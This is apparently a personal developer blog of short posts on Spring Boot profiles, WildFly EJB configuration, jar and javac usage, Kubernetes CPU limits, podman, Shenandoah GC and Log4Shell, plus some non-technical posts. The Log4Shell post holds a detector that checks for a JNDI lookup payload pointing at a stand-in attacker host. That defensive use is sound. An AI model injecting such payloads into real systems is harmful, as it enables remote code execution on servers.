Spring boot multiple profiles

All

Developing Java web applications with Spring becomes considerably easier with profiles, both for production and for fast non-production iterations. Since Spring Boot 1.3, just adding the line below to application.properties makes it very simple to use a separate profile for each environment:

spring.profiles.active=@activatedProperties@

And then defining the profiles in Maven's pom.xml:

<profiles>
	<profile>
		<id>local</id>
		<properties>
			<activatedProperties>local</activatedProperties>
		</properties>
		<activation>
			<!-- set to true to make this profile the default -->
			<activeByDefault>false</activeByDefault>
		</activation>
	</profile>
</profiles>

You then have a series of application-*.properties files, which must follow the pattern application-{custom_suffix}.properties and be placed under src/main/resources/ – for example src/main/resources/application-test.properties – where you define the properties for each profile:

# AUTO-CONFIGURATION - set to false those which are not required
#spring.autoconfigure.exclude= # Auto-configuration classes to exclude.
spring.main.banner-mode=off
spring.jmx.enabled=false
...
server.jsp-servlet.registered=false
spring.freemarker.enabled=false

Interestingly, logging.config seems to be found in the server deployment, not in the application sources. We can use JAVA_OPTS="$JAVA_OPTS -Dlogfile.name=test_file_name" to set the log file name at runtime:

# the appender file name reads the system property set via JAVA_OPTS
appender.R.fileName = ${sys:logfile.name}

reading about fusion energy


I’ve recently seen an amazing number of startups aiming to achieve production-ready energy generation from fusion. It is very exciting, and the number of Canadian companies (or Canadian people behind them) is really remarkable! Some of those have very short-term goals, like Zap Energy.

However, I’ve started to go deeper into understanding this (as much as possible, during the holidays, without that many technical books). There are several books and I’ve just started, but here is a short list.

I started with a brand new book, The Fairy Tale of Nuclear Fusion (2021), by L.J. Reinders, picked based on one of the comments on the video. I’m still on chapter six and it is very well written, but very critical of any timeline for fusion to be achieved. It seems an honest view, i.e. the writer made no assumptions and did the research before coming to a conclusion, then wrote the book (not the other way around). But clearly the author has a very hard stance on the over-promises some scientists have made.

My interest started mostly because of the recent (public) discoveries and because of this video by Sabine Hossenfelder. Later I watched a couple of videos comparing tokamaks vs stellarators vs inertial confinement, and ITER vs JET vs other fusion projects. There is a lot of hardcore (deep) information out there; one just needs to look for it, and to know where to look.

EJB with wildfly-services and wildfly-config


I think I’ve already written here about wildfly-config and EJB client configuration. Let me go deeper on this topic this time (the previous posts about it are here1 and here2).

wildfly-config.xml has its own syntax, but it is quite simple to understand; let’s see a complete example. Basically everything must be inside configuration, with authentication-client below it, where we define the key stores, SSL contexts, and SSL context rules – the rules reference a context, which in turn references a key store. The default authentication rule is used here, and it is defined at the bottom.

<?xml version="1.0" encoding="UTF-8"?>
...
<configuration>
  <authentication-client xmlns="urn:elytron:1.0">
      <!-- key stores-->
      <key-stores>
        <key-store name="qsKeyStore" type="JKS">
          <file name="server.keystore"/>
          <key-store-clear-password password="secret"/>
        </key-store>
      </key-stores>
      <!-- ssl context definition -->
      <ssl-contexts>
        <ssl-context name="aContext">
          <trust-store key-store-name="qsKeyStore"/>
          <cipher-suite selector="DEFAULT"/>
          <protocol names="TLSv1.2"/> <!-- tls v 1.2 -->
        </ssl-context>
      </ssl-contexts>
      <!-- usage -->
      <ssl-context-rules>
            <rule use-ssl-context="aContext"/>
      </ssl-context-rules>

        <!-- authentication rules use the default configuration -->
        <authentication-rules>
                    <rule use-configuration="default" />
        </authentication-rules>
        <!-- Default configuration, defined below and used above -->
        <authentication-configurations>
            <configuration name="default">
                <sasl-mechanism-selector selector="#ALL" />
                <set-mechanism-properties>
                    <property key="wildfly.sasl.local-user.quiet-auth" value="true" />
                 </set-mechanism-properties>
                <providers>
                    <use-service-loader/>
                </providers>
                <!-- Used for EJB over HTTP, remoting invocations will use transparent auth-->
                <set-user-name name="auser" />
                <credentials>
                    <clear-password password="apassword!" />
                </credentials>
             </configuration>
        </authentication-configurations>
    </authentication-client>
</configuration>

Now, in regards to actually using wildfly-config.xml, the client just performs a regular JNDI lookup, over HTTP or HTTPS.


And for the initial context, on the latest WildFly, we can do as follows:

	// Get the initial context
	public static Context getInitialContext() throws NamingException {
		Properties props = new Properties();
		props.put(Context.INITIAL_CONTEXT_FACTORY, "org.wildfly.naming.client.WildFlyInitialContextFactory");
		props.put(Context.PROVIDER_URL, "https://localhost:8443/wildfly-services"); // <---- https on port 8443
		return new InitialContext(props);
	}

So then the provider URL is, basically, http://localhost:8080/wildfly-services or https://localhost:8443/wildfly-services.

Create jars and manifest files


Continuing from my last posts: let’s create a simple jar with the default content, using the -v option for verbose (which will tell us exactly what is being added). Example:

jar cvf Example.jar * (or MyClass.class)

And compare with the -0 option (which stores the files without compressing them, and therefore produces a heavier jar). In some tests I’ve done here, compression can save considerable space – around 30% in some cases:

jar -c0vf Example.jar *

Now let’s set the main class with the `-e` option:

# using -c to create the archive, -v for verbose, -f for the output file, and -e for setting the entry point (main class)
jar -cvfe ClientJar.jar StandaloneClient StandaloneClient.class

Now, let’s pretend we want to create a sealed jar, for instance when shipping it to a customer. To do so we add a customized manifest file, using jar -cvfm (-m to use a custom manifest file), and create a manifest with the following content (among other possible customizations):

Manifest-Version: 1.0
Sealed: true <---- seals the jar

What is more interesting is that creating jars manually made me learn much more about how Java classes are compiled – for instance, the fact that inner classes generate separate class files, like StandaloneClient$InnerClass.class. That is quite expected and obvious, but when creating the jar we need to use jar -cvf ClientJar.jar *.class so we don’t end up forgetting to add the inner classes!

The same happens if we implement Runnable and the like with an anonymous class, which produces a StandaloneClient$1.class <— de facto an anonymous inner class created just because we implemented Runnable. If you forget it, you will clearly face this (and wonder how it happened):

java.lang.NoClassDefFoundError: StandaloneClient$1 <---- here
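To see where that $1 file comes from, here is a minimal sketch (the class and method names are made up): compiling it produces two class files, StandaloneClient.class and StandaloneClient$1.class, and both must go into the jar.

```java
// StandaloneClient.java - compiling this produces TWO class files:
// StandaloneClient.class and StandaloneClient$1.class (the anonymous Runnable)
public class StandaloneClient {

    public static String runTask() {
        final StringBuilder out = new StringBuilder();
        // anonymous inner class: javac emits it as StandaloneClient$1.class
        Runnable task = new Runnable() {
            @Override
            public void run() {
                out.append("task ran");
            }
        };
        task.run();
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(runTask());
    }
}
```

If StandaloneClient$1.class is left out of the jar, the NoClassDefFoundError above shows up only when the Runnable is first touched at runtime.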

Most of the time we don’t even bother creating/editing the manifest file (since the IDE creates and packages it). But it is actually very useful and can come in handy in some scenarios.

Well, I guess that’s all the suggestions for today. Maybe next week I’ll do a blog post about o11y (observability), complementing my posts about java and k8s (and OCP).

Taking the world by storm: Log4Shell vulnerability CVE-2021-44228


On the morning of Friday, December 10th, the news of the Log4Shell vulnerability (CVE-2021-44228) started to appear; a few hours later lists of affected sites were already being shown on GitHub – examples were Tesla, Apple, Amazon, and Twitter.

This vulnerability is very much related to a topic I usually post about here: JNDI lookup, and LDAP in the context of EJB returning Java objects – aka serialization. And CVE-2021-44228 is basically that, a JNDI lookup().
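As an illustration only (this is not log4j code), the attack hinges on a lookup token embedded in logged user input. A naive detector for the payload shape, similar in spirit to the scanners people ran at the time, could look like:

```java
// Illustrative sketch only - NOT log4j code. Log4Shell payloads embed a
// lookup token of the form ${jndi:ldap://attacker/...} in any logged string.
public class JndiLookupDetector {

    public static boolean containsJndiLookup(String message) {
        // log4j expands tokens of the form ${jndi:<protocol>://...};
        // lower-casing catches trivial case variations like ${JNDI:...}
        return message != null && message.toLowerCase().contains("${jndi:");
    }

    public static void main(String[] args) {
        System.out.println(containsJndiLookup("${jndi:ldap://evil.example/a}")); // true
        System.out.println(containsJndiLookup("a normal log line"));             // false
    }
}
```

Note that real payloads quickly moved to obfuscated forms (nested lookups like ${${lower:j}ndi:...}), so naive string matching was easily bypassed – this only illustrates the basic shape of the payload.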

Updating your JDK to the latest will not save you from this one, but depending on the JDK version it is much easier to exploit. Explanation:

JDK version | Vulnerability
< 8u121     | Starting with Java 8u121, remote codebases were no longer permitted by default for RMI (but not for LDAP).
<= 8u191    | There is a direct path from a controlled JNDI lookup to remote classloading of arbitrary code.
> 8u191     | RMI references and object construction can still happen. Example: Apache Xbean BeanFactory.

Solutions have already been described at length: basically updating log4j or removing the JNDI lookup class. Since log4j 2.15.0, this behavior is disabled by default.

javac


javac is the very well known tool that reads source files, .java, and creates bytecode, the .class files. Very useful, and it can be used with the following options. I think -cp and -d are the most well known ones. However, it has so many features we pretty much overlook that I think it is worth a second look (some examples from Nam Ha's blog).

For instance, there is also -verbose; an example (using my favorite suite of Java programs, from the Univ of Texas):

[fdemeloj@fdemeloj javac]$ javac -version FilterExample.java 
javac 1.7.0_171 <------------------------------------------------------ yes, javac is default for JDK 7, use alternatives to fix this
...
[fdemeloj@fdemeloj javac]$ javac -verbose First.java 
[parsing started RegularFileObject[First.java]]
[parsing completed 14ms]
[search path for source files: .]
[search path for class files: 
...pulse-java.jar,.]
../rt.jar/java/awt/Frame.class)]]
../rt.jar/java/awt/MenuContainer.class)]]
../rt.jar/java/lang/Object.class)]]
../rt.jar/java/awt/Window.class)]]
../rt.jar/javax/accessibility/Accessible.class)]]
../rt.jar/java/awt/Container.class)]]
...
[wrote RegularFileObject[First.class]]
[total 520ms]
[fdemeloj@fdemeloj javac]$ java First 

And given a certain directory (that already exists) you can use -d to place the compiled classes there: javac -d classes First.java, so the .class files will end up under the classes/ dir.
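The same flags can also be driven programmatically through the standard javax.tools compiler API (it requires a JDK, not just a JRE). A minimal sketch, with made-up file and directory names:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.tools.JavaCompiler;
import javax.tools.ToolProvider;

public class CompileDemo {

    // Writes a trivial source file and compiles it with the same flags we
    // would pass on the command line: javac -d classes -Xlint First.java
    public static boolean demo() {
        try {
            Path dir = Files.createTempDirectory("javac-demo");
            Path src = dir.resolve("First.java");
            Files.writeString(src, "class First { }\n");
            Path classes = Files.createDirectories(dir.resolve("classes"));

            JavaCompiler javac = ToolProvider.getSystemJavaCompiler();
            int rc = javac.run(null, null, null,
                    "-d", classes.toString(), "-Xlint", src.toString());

            // -d placed the bytecode under classes/, not next to the source
            return rc == 0 && Files.exists(classes.resolve("First.class"));
        } catch (IOException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println("compiled ok: " + demo());
    }
}
```

This is handy for build tooling or tests that need to compile sources on the fly without shelling out to the javac binary.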

Interestingly, the -Xdiags:verbose (and :compact) options do not add anything on top of the -verbose compilation trace itself, but depending on the error they show much more detail about the diagnostic: -Xdiags:verbose will show what was required vs what was found, which helps a lot (see below – the Driver01 class):

[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -verbose Driver01.java  <--------------------------------------- verbose
[parsing started SimpleFileObject[/home/fdemeloj/Downloads/cases/EJBtests/javac/Driver01.java]]
[parsing completed 29ms]
[loading /modules/java.xml.crypto/module-info.class] 
<<several others>>>
...
Driver01.java:41: error: incompatible types: possible lossy conversion from double to int
            swap(j, range, enterArray);
                 ^
[total 366ms]
Note: Some messages have been simplified; recompile with -Xdiags:verbose to get full output
1 error
[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdiags:compact Driver01.java  <----------------------------------- compact
Driver01.java:41: error: incompatible types: possible lossy conversion from double to int
            swap(j, range, enterArray);
                 ^
Note: Some messages have been simplified; recompile with -Xdiags:verbose to get full output
1 error
[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdiags:verbose Driver01.java <----------------------------------- verbose
Driver01.java:41: error: method swap in class Driver01 cannot be applied to given types;
            swap(j, range, enterArray);
            ^
  required: int,int,double[]
  found: double,int,double[]
  reason: argument mismatch; possible lossy conversion from double to int
1 error

And some extra options can be found with --help-extra:


[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac --help-extra
  --add-exports <module>/<package>=<other-module>(,<other-module>)*
        Specify a package to be considered as exported from its defining module
        to additional modules, or to all unnamed modules if <other-module> is ALL-UNNAMED.
  --add-reads <module>=<other-module>(,<other-module>)*
        Specify additional modules to be considered as required by a given module.
        <other-module> may be ALL-UNNAMED to require the unnamed module.

One of the most useful options is actually -Xlint (maybe because of my background in Python and its lint process, PEP-8 and so forth). I will end up doing a blog post about PMD, Checkstyle, and PetitDej as well:

[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xlint First.java 
First.java:3: warning: [serial] serializable class First has no definition of serialVersionUID <------ 
class First extends Frame{
^
1 warning

Interestingly, the --release flag (added back in JDK 9) not only sets the source and target versions, but also makes the compiler use the symbol table for the JDK libraries corresponding to the specified release. It basically replaces --source and --target.

Note: on JDK 11 (I think I already mentioned this here) you can just run java on the source file, instead of javac first, and the class will run:

java Hello.java
Hello, so much snow today in MTL!

I think one of the most useful options, which makes javac almost like Maven, is -Werror: it halts the compilation when a warning happens, turning every warning into an error:

[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdoclint:all -Werror First.java 
First.java:3: warning: no comment
class First extends Frame{
^
First.java:5: warning: no comment
First(){
^
First.java:15: warning: no comment
public static void main(String args[]){
                   ^
error: warnings found and -Werror specified
1 error <--------------------------------------------------------------------------- 1 error
3 warnings <------------------------------------------------------------------------ 3 warnings
[fdemeloj@fdemeloj javac]$ $JAVA_HOME/bin/javac -Xdoclint:all First.java 
First.java:3: warning: no comment
class First extends Frame{
^
First.java:5: warning: no comment
First(){
^
First.java:15: warning: no comment
public static void main(String args[]){
                   ^
3 warnings <--------------------------------------------------------------------------- 3 warnings

Learning Nihongo


I think this is, at the moment, the most difficult language I’ve studied – by a considerable margin.

Even using Quizlet and Ankiweb, and tutoring classes. The alphabets are not easy.

After studying Hiragana/Katakana 2x or 3x more than the entire time I’ve studied the Cyrillic alphabet (a solid 3x more), I started to memorize the actual letters. And then the verbs, wow.

The tip is to keep the pace, study every day, and not give up. After six months of study I saw a considerable improvement in my pronunciation and understanding.

I can only be grateful to my sensei, Caio (email caiounb.jap@gmail.com), who has helped me considerably along this path. I would recommend the services of the Mirai school; they have teachers that speak English as well.

After a few years(!) of pandemic, I cannot wait to board my plane to Tokyo and visit them.

CFS, Milli cores and CPU metrics


Playing with OCP (on large projects) we see how important it is to set adequate memory resources for the application – java == JVM == planning for nominal and spike memory usage. Less talked about, but also very important, are the CPU resources. Basically, each container running on a node consumes compute resources, and setting/adding/increasing the number of threads is easy as long as we take into consideration the container limits in terms of CPU. Compute resources == resources (memory and CPU).

spec:
  containers:
  - name: app
    image: images.my-company.example/app:v4
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "128Mi"
        cpu: "500m"

Planning your application/environment

It is about planning the application: if you know that your app will eat, let’s say, 2 CPUs, then you set requests to 2000m millicores == 2 cores (1/5 of a core would be 200m, and 1 core == 1000m). Take into consideration that requests are what the application wants at startup and during normal runs, while limits are the threshold – for memory, once reached, the kernel will kill the process with an OOM. Knowing that the application should not exceed 3 CPUs, you set the limit to 3000m == 3 cores. Plan for nominal usage but also for high spikes and corner-case (outlier) utilization. In Kubernetes, 0.5 core == 500m == half a core.
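The millicore arithmetic above can be sketched in a few lines (this helper class is made up for illustration; it is not a Kubernetes API):

```java
// Minimal sketch of the Kubernetes millicore arithmetic: "1000m" == 1 core.
public class Millicores {

    public static double toCores(String quantity) {
        if (quantity.endsWith("m")) {
            // strip the "m" suffix: "2000m" -> 2000 millicores -> 2.0 cores
            return Long.parseLong(quantity.substring(0, quantity.length() - 1)) / 1000.0;
        }
        return Double.parseDouble(quantity); // a plain "2" means 2 cores
    }

    public static void main(String[] args) {
        System.out.println(toCores("2000m")); // request: 2 cores
        System.out.println(toCores("3000m")); // limit: 3 cores
        System.out.println(toCores("500m"));  // half a core
    }
}
```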

Requests do not necessarily mean usage

Setting requests = 2000m does not mean the container will use those 2 CPUs. It can start with a lower amount, let’s say 500m, and keep growing. Think of requests as the normal amount of resources the application will use. Basically, to increase the load on CPU and memory you need to make sure you have enough resources to play with (within the limits, and on the host as well).

Throttling

Well, in case a container attempts to use more CPU than the specified limit, the system will throttle the container – hold it off. This basically allows your container to have a consistent level of service independent of the number of pods scheduled on the node. On the CPU chart you see in the console, you will see a plateau /----\ before a decrease. Basically the quota/period ratio.

Quotas and the Completely Fair Scheduler

Bringing back some knowledge from the Dorsal Lab in Montreal (listening to Blonde) and from studying the Linux kernel and preemption: Kubernetes uses the well known CFS (Completely Fair Scheduler) quota to enforce CPU limits on pod containers, and the quotas force preemption exactly like in the Linux kernel 🙂. This explains in more detail how the CPU Manager works.
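As a back-of-the-envelope sketch of how a CPU limit becomes a CFS quota (the helper is hypothetical; 100000us is the kernel's default cfs_period_us):

```java
// Sketch of the CPU limit -> CFS quota mapping used to throttle containers.
public class CfsQuota {

    static final long PERIOD_US = 100_000; // 100ms default scheduling period

    // A limit of 1000m (one core) buys one full period of CPU time per period;
    // 500m therefore buys 50ms of CPU time per 100ms period before the
    // container is throttled (the plateau on the CPU chart).
    public static long quotaMicros(long millicores) {
        return millicores * PERIOD_US / 1000;
    }

    public static void main(String[] args) {
        System.out.println(quotaMicros(500));  // cpu limit "500m"  -> 50000us
        System.out.println(quotaMicros(3000)); // cpu limit "3000m" -> 300000us
    }
}
```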

There are some recommendations to not set CPU limits for applications/pods that shouldn’t be throttled. But I would just set a very high limit 🙂

Podman | Thanks for the accesses


For all the posts I’ve created over the last couple of weeks, I’ve seen people accessing this blog from all over the world – Norway, China, Singapore, Vietnam, Switzerland (yes, I wrote that in one go and got it right). So thanks for your visits. With 3 years at Red Hat working with Java, Python, and C++, and about 12 years on this IT road (since 2009), as my Nihongo sensei says: the more I learn, the more I realize how little I know. But I’m very glad to help all the developers out there.

Today we will talk about building images with podman from a Dockerfile.

The Dockerfile has a simple syntax – pretty much FROM, COPY, and RUN. The trick with the Dockerfile is that it is very simple to use and at the same time very powerful:

Example of a build with podman and a Dockerfile (some Dockerfile best practices can be found here):

# syntax=docker/dockerfile:1
FROM node:12-alpine
RUN apk add --no-cache python3 g++ make
WORKDIR /app
COPY . .
RUN yarn install --production
CMD ["node", "src/index.js"]

Context directory

Interestingly, although I’m using podman 1.6.4, I still need to set the context directory of the build, which I think shouldn’t be necessary.

$ sudo podman build -t myimage . <-------- don't forget the "." (the context directory)
STEP 1: FROM registry.redhat.io/datagrid/datagrid-8-rhel8:1.2
Error: error creating build container: Error initializing source docker://registry.redhat.io/datagrid/datagrid-8-rhel8:1.2: unable to retrieve auth token: invalid username/password: unauthorized: Please login to the Red Hat Registry using your Customer Portal credentials. Further instructions can be found here: https://access.redhat.com/RegistryAuthentication

deep in Shenandoah GC


Going deep in my investigations of Shenandoah, there is a world of things to learn. What is interesting is that the more you learn about one GC specifically, the more you learn about the others (as a consequence of the associations and correlations your mind makes). It is just like reading a book only about Russian rockets (like the N1): at some point you will understand SpaceX’s Merlin/Raptor combustion ratios and such much more easily. Anyways.

Reviewing the videos and the actual original paper, “Shenandoah: An open-source concurrent compacting garbage collector for OpenJDK”, it is very interesting that they solve the problem of concurrent access with basically two concepts: SATB (snapshot-at-the-beginning, which is also used by CMS and G1) and the forwarding pointer (which adds one more word to the two header words already there in OpenJDK).

One of the details that I understood much better while learning about Shenandoah was the importance of compaction to avoid fragmentation, which actually plagues CMS (deprecated in JDK 9, and gone for good in JDK 14). Learning about concurrent GCs helps you learn about STW GCs too – of course, all of them are GCs at the end of the day.

Concurrent compaction (evacuation) is a very big part of the Shenandoah algorithm, as it is one of the three main concurrent phases – the other two being concurrent marking (bracketed by the init-mark and final-mark STW pauses) and concurrent updating of references.

Roman Kennke has been a very good mentor, setting up stepping stones for me to learn considerably. But also the PhD thesis from Paul Thomas, which introduces several concepts like SATB vs incremental updates, and barriers – write/read barriers and so on. And of course the forwarding pointer, and how it changed from Shenandoah 1 to Shenandoah 2.